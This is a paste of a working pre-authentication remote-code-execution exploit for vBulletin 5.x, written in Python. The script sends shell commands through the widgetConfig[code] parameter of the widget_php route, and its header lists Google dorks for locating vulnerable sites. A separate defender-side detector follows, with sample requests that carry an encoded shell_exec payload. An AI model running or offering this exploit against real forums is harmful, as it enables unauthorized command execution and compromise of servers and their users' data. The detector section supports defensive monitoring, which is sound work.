m0rkus

vBulletin 5.x 0day pre-auth RCE exploit

Sep 24th, 2019
```python
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
    try:
        cmd = raw_input("vBulletin$ ")
        params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
        r = requests.post(url = sys.argv[1], data = params)
        if r.status_code == 200:
            print r.text
        else:
            sys.exit("Exploit failed! :(")
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception, e:
        sys.exit(str(e))
```
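
A defender-side companion, added here and not part of the original paste: a small Python 3 detector that flags captured requests combining the `routestring=ajax/render/widget_php` route with a `widgetConfig[code]` parameter, the pair this script sends. The function names, the `(url, body)` record shape and the sample traffic are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Route and parameter name come from the paste; all other names are assumptions.
TARGET_ROUTE = "ajax/render/widget_php"
CODE_PARAM = re.compile(r"^widgetconfig\[\s*['\"]?code['\"]?\s*\]", re.I)


def inspect_request(url, body=""):
    """Return a finding dict if the request matches the paste's pattern, else None.

    Query-string and form-body parameters are checked together so the result
    does not depend on where the client placed them.
    """
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    route_hit, code_value = False, None
    for name, value in pairs:
        name = name.strip()
        if name.lower() == "routestring":
            # Normalise case and stray slashes before comparing.
            route_hit |= value.strip().strip("/").lower() == TARGET_ROUTE
        elif CODE_PARAM.match(name):
            code_value = value
    if route_hit and code_value is not None:
        return {"url": url, "code_preview": code_value[:60]}
    return None


def scan(records):
    """records: iterable of (url, body) pairs from a proxy or WAF capture."""
    return [f for f in (inspect_request(u, b) for u, b in records) if f]


# Constructed sample traffic (forum.example is a placeholder host).
SAMPLE = [
    ("https://forum.example/index.php",
     "routestring=ajax%2Frender%2Fwidget_php"
     "&widgetConfig%5Bcode%5D=echo+shell_exec%28%27id%27%29%3B+exit%3B"),
    ("https://forum.example/index.php?routestring=/Ajax/Render/Widget_PHP",
     "widgetConfig[code]=echo+1"),
    ("https://forum.example/index.php", "routestring=ajax/render/widget_php"),
    ("https://forum.example/search", "q=widget_php&securitytoken=guest"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print("ALERT", finding["url"], "->", finding["code_preview"])
```

Because the script sends its parameters in a POST body, this check needs a source that records request bodies, such as a reverse proxy or WAF capture; a standard access log with only the request line would miss it.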